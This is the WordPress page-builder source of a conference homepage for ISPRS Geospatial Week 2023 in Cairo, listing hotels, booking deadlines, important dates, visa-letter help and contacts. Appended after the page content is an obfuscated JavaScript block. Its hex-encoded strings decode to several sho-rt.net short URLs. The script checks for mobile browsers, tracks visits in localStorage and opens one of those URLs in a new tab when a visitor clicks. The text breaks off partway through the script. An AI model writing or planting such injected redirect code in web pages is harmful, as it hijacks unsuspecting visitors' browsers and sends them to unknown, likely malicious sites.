!important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const 